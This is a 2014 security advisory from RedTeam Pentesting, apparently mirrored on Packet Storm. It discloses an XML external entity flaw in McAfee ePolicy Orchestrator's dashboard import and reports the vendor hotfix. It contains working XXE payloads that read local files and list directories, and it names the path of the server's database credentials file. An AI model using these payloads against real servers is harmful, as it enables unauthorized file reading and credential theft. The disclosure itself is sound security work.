exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

McAfee ePolicy Orchestrator XML External Entity Expansion

McAfee ePolicy Orchestrator XML External Entity Expansion
Posted Feb 25, 2014
Site redteam-pentesting.de

RedTeam Pentesting identified an XML external entity expansion vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature. Users with the ability to create new dashboards in the ePO web interface who exploit this vulnerability can read local files on the ePO server, including sensitive data like the ePO database configuration. Versions 4.6.7 and below are affected.

tags | exploit, web, local, xxe
SHA-256 | f7760236a00eacc72f537370300bd2e7c27f9ec542d2cb4813cf607dd4d9f889

McAfee ePolicy Orchestrator XML External Entity Expansion

Change Mirror Download
Advisory: McAfee ePolicy Orchestrator XML External Entity Expansion in
Dashboard

RedTeam Pentesting identified an XML external entity expansion
vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature.
Users with the ability to create new dashboards in the ePO web interface
who exploit this vulnerability can read local files on the ePO server,
including sensitive data like the ePO database configuration.


Details
=======

Product: McAfee ePolicy Orchestrator
Affected Versions: 4.6.7 and below
Fixed Versions: 4.6.7 + hotfix 940148
Vulnerability Type: XML External Entity Expansion
Security Risk: high
Vendor URL: http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx
Vendor Status: hotfix released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-001
Advisory Status: public
CVE: GENERIC-MAP-NOMATCH
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

McAfee ePO allows to centrally manage other systems, including deploying
new software and collecting system information. Dashboards allow
privileged users to view statistics and current data about ePO and
associated systems.


More Details
============

Users with access to McAfee ePO's web interface can have the permission
to add new dashboards. Dashboard definitions can be exported as XML data
and also be imported again. A basic XML dashboard definition looks like
follows:

<dashboard id="1">
<name>RedTeam Pentesting</name>
<filteringEnabled>false</filteringEnabled>
</dashboard>

Importing a dashboard consists of uploading the XML data and confirming
the import afterwards. On the confirmation page the dashboard's name
defined in the XML tag "name" is shown.

The ePO system allows to add a user-defined DTD to the XML data and
therefore add additional entities, which will be expanded by the system.
The following example results in an dashboard with the name "RedTeam
Pentesting Entity":

<?xml version="1.0"?>
<!DOCTYPE dashboard [
<!ENTITY redteam "RedTeam Pentesting Entity">
]>
<dashboard id="1">
<name>&redteam;</name>
<filteringEnabled>false</filteringEnabled>
</dashboard>

It is also possible to specify external entities that for example point
to local files on the ePO server. The entity will then be expanded to
contain the file's content. This works as long as the file contents do
not make the resulting XML data invalid. Data that cannot be read
includes for example binary data or files containing XML data
themselves.

If the entity is used in the dashboard's name, the confirmation page
shown when importing a dashboard displays the contents of the file.

The following example XML data can be uploaded to read the file
C:\boot.ini:

<?xml version="1.0"?>
<!DOCTYPE dashboard [
<!ENTITY redteam SYSTEM "file:///c:/boot.ini">
]>
<dashboard id="1">
<name>&redteam;</name>
<filteringEnabled>false</filteringEnabled>
</dashboard>

It is also possible to get directory listings by using a file URL that
points to a directory, for example the C: drive:

<!ENTITY redteam SYSTEM "file:///c:/">


Workaround
==========

RedTeam Pentesting is not aware of any workarounds.


Fix
===

McAfee has issued a hotfix[0] for version 4.6.7 that removes the
vulnerability. An upgrade to the newer 5.x branch of the product will
also resolve this problem.


Security Risk
=============

The vulnerability is mitigated by the fact that users already need valid
login credentials for the ePO system and the permission to create
dashboards for a successful exploitation.

It is still considered to be of a high risk potential however, as it
gives attackers the opportunity to read potentially sensitive file
contents on the server. This includes for example ePO's database
credentials, which are typically stored in a file available at a path
like the following:

C:\programs\mcafee\epolicy orchestrator\server\conf\orion\db.properties

The credentials in this file are encrypted with a static key that is
publicly known and included for example in Metasploit[1].

Depending on the actual network structure, it might be possible to use
the decrypted credentials to read and alter the information in the ePO
database. This might lead to a compromise of the clients that are
managed by ePO.


Timeline
========

2013-11-20 Vulnerability identified
2013-11-22 Customer decided to coordinate disclosure with vendor
2014-02-14 Vendor replied to customer
2014-02-24 Vendor released hotfix for version 4.6.7 and a public
Security Bulletin[0]
2014-02-25 Advisory released


References
==========

[0] https://kc.mcafee.com/corporate/index?page=content&id=SB10065
[1] https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/epo_sql.rb


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close